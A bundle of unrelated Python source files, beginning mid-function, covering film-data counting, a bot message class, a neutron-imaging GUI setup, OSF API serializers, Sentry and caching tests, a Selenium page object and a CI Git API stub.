if header_row == True:
input_lst = input_lst[1:]
for each in input_lst:
if each[index] == input_str:
num_elt += 1
return num_elt
def summary_statistics(input_lst):
input_lst = input_lst[1:]
num_japan_films = feature_counter(input_lst, 6, "Japan")
num_color_films = feature_counter(input_lst, 2, "Color")
num_films_in_english = feature_counter(input_lst, 5, "English")
summary_dict = {"japan_films": num_japan_films,
"color_films": num_color_films,
"films_in_english": num_films_in_english}
return summary_dict
summary = summary_statistics(movie_data)
|
from .keyboards import Keyboard
class Message(object):
def __init__(self, message: str, keyboard: Keyboard = None, lat: float = None, long: float = None,
attachment: str = None):
if not isinstance(message, str):
raise TypeError('message must be an instance of str')
if keyboard is not None:
if not isinstance(keyboard, Keyboard):
raise TypeError('keyboard must be an instance of Keyboard')
self.message = message
self.keyboard = keyboard
self.lat = lat
self.long = long
self.attachment = attachment
def to_dict(self):
res = {
'message': self.message,
}
if self.lat and self.long:
res['lat'] = self.lat
res['long'] = self.long
if self.keyboard:
res['keyboard'] = self.keyboard.to_dict()
if self.attachment:
res['attachment'] = self.attachment
return res
|
import numpy as np
import matplotlib
import os
import copy
matplotlib.use('Qt5Agg')
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
from qtpy.QtWidgets import QProgressBar, QVBoxLayout
from qtpy import QtGui
import pyqtgraph as pg
from __code.table_handler import TableHandler
from __code.bragg_edge.mplcanvas import MplCanvas
from __code.dual_energy.my_table_widget import MyTableWidget
from __code.bragg_edge.bragg_edge_peak_fitting_gui_utility import GuiUtility
class Initialization:
distance_detector_sample = 1300 # m
detector_offset = 6500 # micros
def __init__(self, parent=None, tab='all'):
self.parent = parent
self.block_signals(True)
self.pyqtgraph_image_view()
self.pyqtgraph_image_ratio_view()
self.pyqtgraph_profile()
self.matplotlib()
self.widgets()
self.roi_setup()
self.text_fields()
self.labels()
self.table_header()
# if tab == 'all':
# self.normalize_images_by_white_beam()
# self.save_image_size()
# self.widgets()
#
# self.statusbar()
# self.pyqtgraph_fitting()
# self.kropff_fitting_table()
self.block_signals(False)
def pyqtgraph_image_ratio_view(self):
# image view
self.parent.ui.image_ratio_view = pg.ImageView()
self.parent.ui.image_ratio_view.ui.roiBtn.hide()
self.parent.ui.image_ratio_view.ui.menuBtn.hide()
image_layout = QVBoxLayout()
image_layout.addWidget(self.parent.ui.image_ratio_view)
self.parent.ui.calculation_bin_widget.setLayout(image_layout)
def normalize_images_by_white_beam(self):
white_beam_ob = self.parent.o_bragg.white_beam_ob
list_data = self.parent.o_norm.data['sample']['data']
for _index_data, _data in enumerate(list_data):
normalized_data = _data / white_beam_ob
self.parent.o_norm.data['sample']['data'][_index_data] = normalized_data
def block_signals(self, flag):
list_ui = []
for _ui in list_ui:
_ui.blockSignals(flag)
def save_image_size(self):
_image = self.parent.get_live_image()
[height, width] = np.shape(_image)
self.parent.image_size['width'] = width
self.parent.image_size['height'] = height
def statusbar(self):
self.parent.eventProgress = QProgressBar(self.parent.ui.statusbar)
self.parent.eventProgress.setMinimumSize(20, 14)
self.parent.eventProgress.setMaximumSize(540, 100)
self.parent.eventProgress.setVisible(False)
self.parent.ui.statusbar.addPermanentWidget(self.parent.eventProgress)
def pyqtgraph_image_view(self):
# image view
self.parent.ui.image_view = pg.ImageView()
self.parent.ui.image_view.ui.roiBtn.hide()
self.parent.ui.image_view.ui.menuBtn.hide()
image_layout = QVBoxLayout()
image_layout.addWidget(self.parent.ui.image_view)
self.parent.ui.image_widget.setLayout(image_layout)
def pyqtgraph_profile(self):
# profile view
self.parent.ui.profile = pg.PlotWidget(title="Profile of ROI selected")
profile_layout = QVBoxLayout()
profile_layout.addWidget(self.parent.ui.profile)
self.parent.ui.profile_widget.setLayout(profile_layout)
def matplotlib(self):
"""to activate matplotlib plots"""
def _matplotlib(parent=None, widget=None):
sc = MplCanvas(parent, width=5, height=4, dpi=100)
# sc.axes.plot([0,1,2,3,4,5], [10, 1, 20 ,3, 40, 50])
toolbar = NavigationToolbar(sc, parent)
layout = QVBoxLayout()
layout.addWidget(toolbar)
layout.addWidget(sc)
widget.setLayout(layout)
return sc
# self.parent.kropff_high_plot = _matplotlib(parent=self.parent,
# widget=self.parent.ui.high_widget)
def pyqtgraph_fitting(self):
# fitting view
self.parent.ui.fitting = pg.PlotWidget(title="Fitting")
fitting_layout = QVBoxLayout()
fitting_layout.addWidget(self.parent.ui.fitting)
self.parent.ui.fitting_widget.setLayout(fitting_layout)
def labels(self):
# labels
self.parent.ui.detector_offset_units.setText(u"\u03BCs")
self.parent.ui.selection_tof_radiobutton.setText(u"TOF (\u03BCs)")
self.parent.ui.selection_lambda_radiobutton.setText(u"\u03BB (\u212B)")
def text_fields(self):
self.parent.ui.distance_detector_sample.setText(str(self.distance_detector_sample))
self.parent.ui.detector_offset.setText(str(self.detector_offset))
self.parent.ui.selection_bin_size_value.setText(str(self.parent.bin_size_value['index']))
def widgets(self):
self.parent.ui.splitter.setSizes([500, 400])
self.parent.ui.splitter_2.setSizes([500, 400])
self.parent.ui.calculation_bin_table = MyTableWidget(parent=self.parent)
self.parent.ui.calculation_bin_table.cellClicked['int', 'int'].connect(
self.parent.calculation_table_cell_clicked)
self.parent.ui.calculation_bin_table.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.parent.ui.verticalLayout_table.addWidget(self.parent.ui.calculation_bin_table)
def roi_setup(self):
[x0, y0] = self.parent.roi_settings['position']
self.parent.selection_x0y0 = [x0, y0]
width = self.parent.previous_roi_selection['width']
height = self.parent.previous_roi_selection['height']
_pen = QtGui.QPen()
_pen.setColor(self.parent.roi_settings['color'])
_pen.setWidth(self.parent.roi_settings['border_width'])
self.parent.roi_id = pg.ROI([x0, y0],
[width, width],
pen=_pen,
scaleSnap=True)
self.parent.roi_id.addScaleHandle([1, 1], [0, 0])
self.parent.roi_id.addScaleHandle([0, 0], [1, 1])
self.parent.ui.image_view.addItem(self.parent.roi_id)
self.parent.roi_id.sigRegionChanged.connect(self.parent.roi_moved)
def display(self, image=None):
self.parent.live_image = image
_image = np.transpose(image)
_image = self._clean_image(_image)
self.parent.ui.image_view.setImage(_image)
def _clean_image(self, image):
_result_inf = np.where(np.isinf(image))
image[_result_inf] = np.NaN
return image
def table_header(self):
column_names = [u'#', u'From file index', u'To file index',
u'From TOF (\u03BCs)', u'To TOF (\u03BCs)',
u'From \u03BB (\u212B)', u'To \u03BB (\u212B)']
o_high = TableHandler(table_ui=self.parent.ui.summary_table)
o_high.set_column_names(column_names=column_names)
|
#!/usr/bin/env python3
import sys
for line in sys.stdin:
data = line.strip().split()
if len(data) > 1:
ip = data[0]
print('{0}\t{1}'.format(ip, 1))
|
from rest_framework import serializers as ser
from rest_framework import exceptions
from rest_framework.exceptions import ValidationError
from modularodm import Q
from modularodm.exceptions import ValidationValueError
from framework.auth.core import Auth
from framework.exceptions import PermissionsError
from framework.guid.model import Guid
from website.models import Node, User, Comment, Institution
from website.exceptions import NodeStateError, UserNotAffiliatedError
from website.files.models.base import FileNode
from website.util import permissions as osf_permissions
from website.project.model import NodeUpdateError
from api.nodes.utils import get_file_object
from api.base.utils import get_object_or_error, absolute_reverse
from api.base.serializers import (JSONAPISerializer, WaterbutlerLink, NodeFileHyperLinkField, IDField, TypeField,
TargetTypeField, JSONAPIListField, LinksField, RelationshipField, DevOnly,
HideIfRegistration)
from api.base.exceptions import InvalidModelValueError
class NodeTagField(ser.Field):
def to_representation(self, obj):
if obj is not None:
return obj._id
return None
def to_internal_value(self, data):
return data
class NodeSerializer(JSONAPISerializer):
# TODO: If we have to redo this implementation in any of the other serializers, subclass ChoiceField and make it
# handle blank choices properly. Currently DRF ChoiceFields ignore blank options, which is incorrect in this
# instance
filterable_fields = frozenset([
'id',
'title',
'description',
'public',
'tags',
'category',
'date_created',
'date_modified',
'registration',
'root',
'parent'
])
non_anonymized_fields = [
'id',
'title',
'description',
'category',
'date_created',
'date_modified',
'registration',
'tags',
'public',
'links',
'children',
'comments',
'contributors',
'files',
'node_links',
'parent',
'root',
'logs',
]
id = IDField(source='_id', read_only=True)
type = TypeField()
category_choices = Node.CATEGORY_MAP.keys()
category_choices_string = ', '.join(["'{}'".format(choice) for choice in category_choices])
title = ser.CharField(required=True)
description = ser.CharField(required=False, allow_blank=True, allow_null=True)
category = ser.ChoiceField(choices=category_choices, help_text="Choices: " + category_choices_string)
date_created = ser.DateTimeField(read_only=True)
date_modified = ser.DateTimeField(read_only=True)
registration = ser.BooleanField(read_only=True, source='is_registration')
fork = ser.BooleanField(read_only=True, source='is_fork')
collection = DevOnly(ser.BooleanField(read_only=True, source='is_folder'))
dashboard = ser.BooleanField(read_only=True, source='is_dashboard')
tags = JSONAPIListField(child=NodeTagField(), required=False)
template_from = ser.CharField(required=False, allow_blank=False, allow_null=False,
help_text='Specify a node id for a node you would like to use as a template for the '
'new node. Templating is like forking, except that you do not copy the '
'files, only the project structure. Some information is changed on the top '
'level project by submitting the appropriate fields in the request body, '
'and some information will not change. By default, the description will '
'be cleared and the project will be made private.')
current_user_permissions = ser.SerializerMethodField(help_text='List of strings representing the permissions '
'for the current user on this node.')
# Public is only write-able by admins--see update method
public = ser.BooleanField(source='is_public', required=False,
help_text='Nodes that are made public will give read-only access '
'to everyone. Private nodes require explicit read '
'permission. Write and admin access are the same for '
'public and private nodes. Administrators on a parent '
'node have implicit read permissions for all child nodes')
links = LinksField({'html': 'get_absolute_html_url'})
# TODO: When we have osf_permissions.ADMIN permissions, make this writable for admins
children = RelationshipField(
related_view='nodes:node-children',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_node_count'},
)
comments = RelationshipField(
related_view='nodes:node-comments',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'unread': 'get_unread_comments_count'})
contributors = RelationshipField(
related_view='nodes:node-contributors',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_contrib_count'},
)
files = RelationshipField(
related_view='nodes:node-providers',
related_view_kwargs={'node_id': '<pk>'}
)
forked_from = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<forked_from_id>'}
)
node_links = DevOnly(RelationshipField(
related_view='nodes:node-pointers',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_pointers_count'},
))
parent = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<parent_node._id>'},
filter_key='parent_node'
)
registrations = DevOnly(HideIfRegistration(RelationshipField(
related_view='nodes:node-registrations',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_registration_count'}
)))
primary_institution = RelationshipField(
related_view='nodes:node-institution-detail',
related_view_kwargs={'node_id': '<pk>'},
self_view='nodes:node-relationships-institution',
self_view_kwargs={'node_id': '<pk>'}
)
root = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<root._id>'}
)
logs = RelationshipField(
related_view='nodes:node-logs',
related_view_kwargs={'node_id': '<pk>'},
)
def get_current_user_permissions(self, obj):
user = self.context['request'].user
if user.is_anonymous():
return ['read']
permissions = obj.get_permissions(user=user)
if not permissions:
permissions = ['read']
return permissions
class Meta:
type_ = 'nodes'
def get_absolute_url(self, obj):
return obj.get_absolute_url()
# TODO: See if we can get the count filters into the filter rather than the serializer.
def get_user_auth(self, request):
user = request.user
if user.is_anonymous():
auth = Auth(None)
else:
auth = Auth(user)
return auth
def get_node_count(self, obj):
auth = self.get_user_auth(self.context['request'])
nodes = [node for node in obj.nodes if node.can_view(auth) and node.primary and not node.is_deleted]
return len(nodes)
def get_contrib_count(self, obj):
return len(obj.contributors)
def get_registration_count(self, obj):
auth = self.get_user_auth(self.context['request'])
registrations = [node for node in obj.node__registrations if node.can_view(auth)]
return len(registrations)
def get_pointers_count(self, obj):
return len(obj.nodes_pointer)
def get_unread_comments_count(self, obj):
user = self.get_user_auth(self.context['request']).user
node_comments = Comment.find_n_unread(user=user, node=obj, page='node')
file_comments = self.get_unread_file_comments(obj)
return {
'total': node_comments + file_comments,
'node': node_comments,
'files': file_comments
}
def get_unread_file_comments(self, obj):
user = self.get_user_auth(self.context['request']).user
n_unread = 0
commented_file_guids = Guid.find(Q('_id', 'in', obj.commented_files.keys()))
for target in commented_file_guids:
file_obj = FileNode.resolve_class(target.referent.provider, FileNode.FILE).load(target.referent._id)
if obj.get_addon(file_obj.provider):
try:
get_file_object(node=obj, path=file_obj.path, provider=file_obj.provider, request=self.context['request'])
except (exceptions.NotFound, exceptions.PermissionDenied):
continue
n_unread += Comment.find_n_unread(user, obj, page='files', root_id=target._id)
return n_unread
def create(self, validated_data):
if 'template_from' in validated_data:
request = self.context['request']
user = request.user
template_from = validated_data.pop('template_from')
template_node = Node.load(key=template_from)
if template_node is None:
raise exceptions.NotFound
if not template_node.has_permission(user, 'read', check_parent=False):
raise exceptions.PermissionDenied
validated_data.pop('creator')
changed_data = {template_from: validated_data}
node = template_node.use_as_template(auth=self.get_user_auth(request), changes=changed_data)
else:
node = Node(**validated_data)
try:
node.save()
except ValidationValueError as e:
raise InvalidModelValueError(detail=e.message)
return node
def update(self, node, validated_data):
"""Update instance with the validated data. Requires
the request to be in the serializer context.
"""
assert isinstance(node, Node), 'node must be a Node'
auth = self.get_user_auth(self.context['request'])
old_tags = set([tag._id for tag in node.tags])
if 'tags' in validated_data:
current_tags = set(validated_data.get('tags'))
del validated_data['tags']
elif self.partial:
current_tags = set(old_tags)
else:
current_tags = set()
for new_tag in (current_tags - old_tags):
node.add_tag(new_tag, auth=auth)
for deleted_tag in (old_tags - current_tags):
node.remove_tag(deleted_tag, auth=auth)
if validated_data:
try:
node.update(validated_data, auth=auth)
except ValidationValueError as e:
raise InvalidModelValueError(detail=e.message)
except PermissionsError:
raise exceptions.PermissionDenied
except NodeUpdateError as e:
raise ValidationError(detail=e.reason)
return node
class NodeDetailSerializer(NodeSerializer):
"""
Overrides NodeSerializer to make id required.
"""
id = IDField(source='_id', required=True)
class NodeContributorsSerializer(JSONAPISerializer):
""" Separate from UserSerializer due to necessity to override almost every field as read only
"""
non_anonymized_fields = ['bibliographic', 'permission']
filterable_fields = frozenset([
'id',
'bibliographic',
'permission'
])
id = IDField(source='_id', required=True)
type = TypeField()
bibliographic = ser.BooleanField(help_text='Whether the user will be included in citations for this node or not.',
default=True)
permission = ser.ChoiceField(choices=osf_permissions.PERMISSIONS, required=False, allow_null=True,
default=osf_permissions.reduce_permissions(osf_permissions.DEFAULT_CONTRIBUTOR_PERMISSIONS),
help_text='User permission level. Must be "read", "write", or "admin". Defaults to "write".')
links = LinksField({
'self': 'get_absolute_url'
})
users = RelationshipField(
related_view='users:user-detail',
related_view_kwargs={'user_id': '<pk>'},
always_embed=True
)
class Meta:
type_ = 'contributors'
def get_absolute_url(self, obj):
node_id = self.context['request'].parser_context['kwargs']['node_id']
return absolute_reverse(
'nodes:node-contributor-detail',
kwargs={
'node_id': node_id,
'user_id': obj._id
}
)
class NodeContributorsCreateSerializer(NodeContributorsSerializer):
"""
Overrides NodeContributorsSerializer to add target_type field
"""
target_type = TargetTypeField(target_type='users')
def create(self, validated_data):
auth = Auth(self.context['request'].user)
node = self.context['view'].get_node()
contributor = get_object_or_error(User, validated_data['_id'], display_name='user')
# Node object checks for contributor existence but can still change permissions anyway
if contributor in node.contributors:
raise exceptions.ValidationError('{} is already a contributor'.format(contributor.fullname))
bibliographic = validated_data['bibliographic']
permissions = osf_permissions.expand_permissions(validated_data.get('permission')) or osf_permissions.DEFAULT_CONTRIBUTOR_PERMISSIONS
node.add_contributor(contributor=contributor, auth=auth, visible=bibliographic, permissions=permissions, save=True)
contributor.permission = osf_permissions.reduce_permissions(node.get_permissions(contributor))
contributor.bibliographic = node.get_visible(contributor)
contributor.node_id = node._id
return contributor
class NodeContributorDetailSerializer(NodeContributorsSerializer):
"""
Overrides node contributor serializer to add additional methods
"""
def update(self, instance, validated_data):
contributor = instance
auth = Auth(self.context['request'].user)
node = self.context['view'].get_node()
visible = validated_data.get('bibliographic')
permission = validated_data.get('permission')
try:
node.update_contributor(contributor, permission, visible, auth, save=True)
except NodeStateError as e:
raise exceptions.ValidationError(e)
contributor.permission = osf_permissions.reduce_permissions(node.get_permissions(contributor))
contributor.bibliographic = node.get_visible(contributor)
contributor.node_id = node._id
return contributor
class NodeLinksSerializer(JSONAPISerializer):
id = IDField(source='_id')
type = TypeField()
target_type = TargetTypeField(target_type='nodes')
# TODO: We don't show the title because the current user may not have access to this node. We may want to conditionally
# include this field in the future.
# title = ser.CharField(read_only=True, source='node.title', help_text='The title of the node that this Node Link '
# 'points to')
target_node = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<pk>'},
always_embed=True
)
class Meta:
type_ = 'node_links'
links = LinksField({
'self': 'get_absolute_url'
})
def get_absolute_url(self, obj):
node_id = self.context['request'].parser_context['kwargs']['node_id']
return absolute_reverse(
'nodes:node-pointer-detail',
kwargs={
'node_id': node_id,
'node_link_id': obj._id
}
)
def create(self, validated_data):
request = self.context['request']
user = request.user
auth = Auth(user)
node = self.context['view'].get_node()
target_node_id = validated_data['_id']
pointer_node = Node.load(target_node_id)
if not pointer_node or pointer_node.is_folder:
raise InvalidModelValueError(
source={'pointer': '/data/relationships/node_links/data/id'},
detail='Target Node \'{}\' not found.'.format(target_node_id)
)
try:
pointer = node.add_pointer(pointer_node, auth, save=True)
return pointer
except ValueError:
raise InvalidModelValueError(
source={'pointer': '/data/relationships/node_links/data/id'},
detail='Target Node \'{}\' already pointed to by \'{}\'.'.format(target_node_id, node._id)
)
def update(self, instance, validated_data):
pass
class NodeProviderSerializer(JSONAPISerializer):
id = ser.SerializerMethodField(read_only=True)
kind = ser.CharField(read_only=True)
name = ser.CharField(read_only=True)
path = ser.CharField(read_only=True)
node = ser.CharField(source='node_id', read_only=True)
provider = ser.CharField(read_only=True)
files = NodeFileHyperLinkField(
related_view='nodes:node-files',
related_view_kwargs={'node_id': '<node_id>', 'path': '<path>', 'provider': '<provider>'},
kind='folder',
never_embed=True
)
links = LinksField({
'upload': WaterbutlerLink(),
'new_folder': WaterbutlerLink(kind='folder')
})
class Meta:
type_ = 'files'
@staticmethod
def get_id(obj):
return '{}:{}'.format(obj.node._id, obj.provider)
def get_absolute_url(self, obj):
return absolute_reverse(
'nodes:node-provider-detail',
kwargs={
'node_id': obj.node._id,
'provider': obj.provider
}
)
class NodeInstitutionRelationshipSerializer(ser.Serializer):
id = ser.CharField(source='institution_id', required=False, allow_null=True)
type = TypeField(required=False, allow_null=True)
links = LinksField({
'self': 'get_self_link',
'related': 'get_related_link',
})
class Meta:
type_ = 'institutions'
def get_self_link(self, obj):
return obj.institution_relationship_url()
def get_related_link(self, obj):
return obj.institution_url()
def update(self, instance, validated_data):
node = instance
user = self.context['request'].user
inst = validated_data.get('institution_id', None)
if inst:
inst = Institution.load(inst)
if not inst:
raise exceptions.NotFound
try:
node.add_primary_institution(inst=inst, user=user)
except UserNotAffiliatedError:
raise exceptions.ValidationError(detail='User not affiliated with institution')
node.save()
return node
node.remove_primary_institution(user)
node.save()
return node
def to_representation(self, obj):
data = {}
meta = getattr(self, 'Meta', None)
type_ = getattr(meta, 'type_', None)
assert type_ is not None, 'Must define Meta.type_'
relation_id_field = self.fields['id']
attribute = relation_id_field.get_attribute(obj)
relationship = relation_id_field.to_representation(attribute)
data['data'] = {'type': type_, 'id': relationship} if relationship else None
data['links'] = {key: val for key, val in self.fields.get('links').to_representation(obj).iteritems()}
return data
class NodeAlternativeCitationSerializer(JSONAPISerializer):
id = IDField(source="_id", read_only=True)
type = TypeField()
name = ser.CharField(required=True)
text = ser.CharField(required=True)
class Meta:
type_ = 'citations'
def create(self, validated_data):
errors = self.error_checker(validated_data)
if len(errors) > 0:
raise ValidationError(detail=errors)
node = self.context['view'].get_node()
auth = Auth(self.context['request']._user)
citation = node.add_citation(auth, save=True, **validated_data)
return citation
def update(self, instance, validated_data):
errors = self.error_checker(validated_data)
if len(errors) > 0:
raise ValidationError(detail=errors)
node = self.context['view'].get_node()
auth = Auth(self.context['request']._user)
instance = node.edit_citation(auth, instance, save=True, **validated_data)
return instance
def error_checker(self, data):
errors = []
name = data.get('name', None)
text = data.get('text', None)
citations = self.context['view'].get_node().alternative_citations
if not (self.instance and self.instance.name == name) and citations.find(Q('name', 'eq', name)).count() > 0:
errors.append("There is already a citation named '{}'".format(name))
if not (self.instance and self.instance.text == text):
matching_citations = citations.find(Q('text', 'eq', text))
if matching_citations.count() > 0:
names = "', '".join([str(citation.name) for citation in matching_citations])
errors.append("Citation matches '{}'".format(names))
return errors
|
from __future__ import absolute_import
from datetime import timedelta
from django.utils import timezone
from django.core.urlresolvers import reverse
from sentry import options
from sentry.testutils import APITestCase, SnubaTestCase
class ProjectEventsTest(APITestCase, SnubaTestCase):
def setUp(self):
super(ProjectEventsTest, self).setUp()
self.min_ago = timezone.now() - timedelta(minutes=1)
options.set('snuba.events-queries.enabled', True)
def test_simple(self):
self.login_as(user=self.user)
project = self.create_project()
group = self.create_group(project=project)
event_1 = self.create_event('a' * 32, group=group, datetime=self.min_ago)
event_2 = self.create_event('b' * 32, group=group, datetime=self.min_ago)
url = reverse(
'sentry-api-0-project-events',
kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
}
)
response = self.client.get(url, format='json')
assert response.status_code == 200, response.content
assert len(response.data) == 2
assert sorted(map(lambda x: x['eventID'], response.data)) == sorted(
[
event_1.event_id,
event_2.event_id,
]
)
def test_message_search(self):
self.login_as(user=self.user)
project = self.create_project()
group = self.create_group(project=project)
self.create_event('x' * 32, group=group, message="how to make fast", datetime=self.min_ago)
event_2 = self.create_event(
'y' * 32,
group=group,
message="Delet the Data",
datetime=self.min_ago)
url = reverse(
'sentry-api-0-project-events',
kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
}
)
response = self.client.get(url, {'query': 'delet'}, format='json')
assert response.status_code == 200, response.content
assert len(response.data) == 1
assert response.data[0]['eventID'] == event_2.event_id
assert response.data[0]['message'] == 'Delet the Data'
def test_filters_based_on_retention(self):
self.login_as(user=self.user)
project = self.create_project()
group = self.create_group(project=project)
two_days_ago = timezone.now() - timedelta(days=2)
self.create_event('c' * 32, group=group, datetime=two_days_ago)
event_2 = self.create_event('d' * 32, group=group, datetime=self.min_ago)
with self.options({'system.event-retention-days': 1}):
url = reverse(
'sentry-api-0-project-events',
kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
}
)
response = self.client.get(url, format='json')
assert response.status_code == 200, response.content
assert len(response.data) == 1
assert response.data[0]['eventID'] == event_2.event_id
|
import os
import time
from logging import getLogger
from uuid import uuid4
import random
import weakref
import gc
import pytest
from easypy.bunch import Bunch
from easypy.caching import timecache, PersistentCache, cached_property, locking_cache
from easypy.units import DAY
from easypy.resilience import resilient
_logger = getLogger(__name__)
def test_timecache():
ts = 0
data = Bunch(a=0, b=0)
def get_ts():
return ts
@timecache(expiration=1, get_ts_func=get_ts, key_func=lambda k: k)
def inc(k, x):
x += 1
data[k] += 1
assert data.a == data.b == 0
inc('a', random.random())
assert (data.a, data.b) == (1, 0)
inc('a', x=random.random())
assert (data.a, data.b) == (1, 0)
ts += 1
inc('a', random.random())
assert (data.a, data.b) == (2, 0)
inc('b', x=random.random())
assert (data.a, data.b) == (2, 1)
inc('b', random.random())
assert (data.a, data.b) == (2, 1)
ts += 1
inc('b', x=random.random())
assert (data.a, data.b) == (2, 2)
inc.cache_clear()
inc('a', x=random.random())
assert (data.a, data.b) == (3, 2)
inc('b', x=random.random())
assert (data.a, data.b) == (3, 3)
inc.cache_clear()
inc('a', x=random.random())
inc('b', x=random.random())
inc('a', x=random.random())
inc('b', x=random.random())
assert (data.a, data.b) == (4, 4)
inc.cache_pop('a', x=random.random())
inc('a', x=random.random())
inc('b', x=random.random())
def test_timecache_method():
ts = 0
def get_ts():
return ts
class Foo:
def __init__(self, prefix):
self.prefix = prefix
@timecache(expiration=1, get_ts_func=get_ts, key_func=lambda args: args)
def foo(self, *args):
return [self.prefix] + list(args)
foo1 = Foo(1)
foo2 = Foo(2)
assert foo1.foo(1, 2, 3) == foo1.foo(1, 2, 3)
assert foo1.foo(1, 2, 3) != foo1.foo(1, 2, 4)
assert foo1.foo(1, 2, 3) != foo2.foo(1, 2, 3)
foo1_1 = foo1.foo(1)
foo1_2 = foo1.foo(2)
foo2_1 = foo2.foo(1)
foo2_2 = foo2.foo(2)
assert foo1_1 == [1, 1]
assert foo1_2 == [1, 2]
assert foo2_1 == [2, 1]
assert foo2_2 == [2, 2]
assert foo1_1 is foo1.foo(1)
assert foo1_2 is foo1.foo(2)
assert foo2_1 is foo2.foo(1)
assert foo2_2 is foo2.foo(2)
assert foo1_1 is foo1.foo(1)
assert foo1_2 is foo1.foo(2)
assert foo2_1 is foo2.foo(1)
assert foo2_2 is foo2.foo(2)
foo1.foo.cache_clear()
foo2.foo.cache_pop(1)
assert foo1_1 is not foo1.foo(1)
assert foo1_2 is not foo1.foo(2)
assert foo2_1 is not foo2.foo(1)
assert foo2_2 is foo2.foo(2)
def test_timecache_getattr():
ts = 0
def get_ts():
return ts
class Foo:
def __init__(self):
self.count = 0
@timecache(expiration=1, get_ts_func=get_ts)
def __getattr__(self, name):
self.count += 1
return [self.count, name]
foo = Foo()
assert foo.bar == [1, 'bar']
assert foo.bar == [1, 'bar']
assert foo.baz == [2, 'baz']
ts += 1
assert foo.baz == [3, 'baz']
assert foo.bar == [4, 'bar']
@pytest.yield_fixture()
def persistent_cache_path():
cache_path = '/tmp/test_pcache_%s' % uuid4()
try:
yield cache_path
finally:
try:
os.unlink("%s.db" % cache_path)
except: # noqa
pass
def test_persistent_cache(persistent_cache_path):
ps = PersistentCache(persistent_cache_path, version=1)
TEST_KEY = "test_key"
TEST_VALUE = "test_value"
ps.set(TEST_KEY, TEST_VALUE)
assert ps.get(TEST_KEY) == TEST_VALUE, "Value does not match set value"
ps = PersistentCache(persistent_cache_path, version=1)
assert ps.get(TEST_KEY) == TEST_VALUE, "Value does not match set value after reopen"
ps = PersistentCache(persistent_cache_path, version=2)
with pytest.raises(KeyError): # Changed version should invalidate cache
ps.get(TEST_KEY)
# Default values
assert ps.get(TEST_KEY, default=None) is None, "Wrong default value returnen(not None)"
assert ps.get(TEST_KEY, default="1") == "1", "Wrong default value returned"
# Cached func should be called only once
value_generated = False
use_cache = True
class UnnecessaryFunctionCall(Exception):
pass
ps = PersistentCache(persistent_cache_path, version=2, ignored_keywords="x")
@ps(validator=lambda _, **__: use_cache)
def cached_func(x):
nonlocal value_generated
if value_generated:
raise UnnecessaryFunctionCall()
value_generated = True
return True
assert cached_func(x=random.random()) is cached_func(x=random.random())
assert value_generated
# Testing validator
use_cache = False
with pytest.raises(UnnecessaryFunctionCall):
cached_func(x=random.random())
# Removing data
ps.clear()
assert ps.get(TEST_KEY, default=None) is None, "Database was not cleared properly"
# Expiration
ps = PersistentCache(persistent_cache_path, version=3, expiration=.01)
ps.set(TEST_KEY, TEST_VALUE)
time.sleep(0.011)
assert ps.get(TEST_KEY, None) is None, "Database was not cleaned up on expiration"
def test_locking_timecache():
from easypy.concurrency import MultiObject
# Cached func should be called only once
value_generated = False
class UnnecessaryFunctionCall(Exception):
pass
@timecache(ignored_keywords='x')
def test(x):
nonlocal value_generated
if value_generated:
raise UnnecessaryFunctionCall()
value_generated = True
return True
MultiObject(range(10)).call(lambda x: test(x=x))
@pytest.mark.parametrize('cache_decorator', [cached_property, timecache()])
def test_caching_gc_leaks(cache_decorator):
"""
Make sure that the cache does not prevent GC collection once the original objects die
"""
class Leaked():
pass
class Foo:
@cache_decorator
def cached_method(self):
return Leaked()
def get(self):
"""Generalize property type and function type caches"""
result = self.cached_method
if callable(result):
result = result()
assert isinstance(result, Leaked), 'cache not used properly - got wrong value %s' % (result,)
return result
foo = Foo()
leaked = weakref.ref(foo.get())
gc.collect()
assert leaked() == foo.get()
del foo
gc.collect()
assert leaked() is None
def test_resilient_between_timecaches():
class ExceptionLeakedThroughResilient(Exception):
pass
@timecache(1)
@resilient(acceptable=ExceptionLeakedThroughResilient, default='default')
@timecache(1)
def foo():
raise ExceptionLeakedThroughResilient()
assert foo() == 'default'
|
from php4dvd.pages.page import Page
from selenium.webdriver.common.by import By
class MovieForm(Page):
@property
def movietitle_field(self):
return self.driver.find_element_by_name("name")
@property
def movieyear_field(self):
return self.driver.find_element_by_name("year")
@property
def movieformat_field(self):
return self.driver.find_element_by_id("formats")
@property
def submit_button(self):
return self.driver.find_element_by_name("submit")
@property
def is_this_page(self):
return self.is_element_visible((By.CSS_SELECTOR, "img[alt='Save']"))
|
# Copyright 2016 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals, absolute_import
import abc
class GitException(Exception):
pass
import logging
import json
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
logger = logging.getLogger('ci')
def copydoc(fromfunc, sep="\n"):
"""
Decorator: Copy the docstring of `fromfunc`
"""
def _decorator(func):
sourcedoc = fromfunc.__doc__
if func.__doc__ == None:
func.__doc__ = sourcedoc
else:
func.__doc__ = sep.join([sourcedoc, func.__doc__])
return func
return _decorator
class GitAPI(object):
__metaclass__ = abc.ABCMeta
PENDING = 0
ERROR = 1
SUCCESS = 2
FAILURE = 3
RUNNING = 4
CANCELED = 5
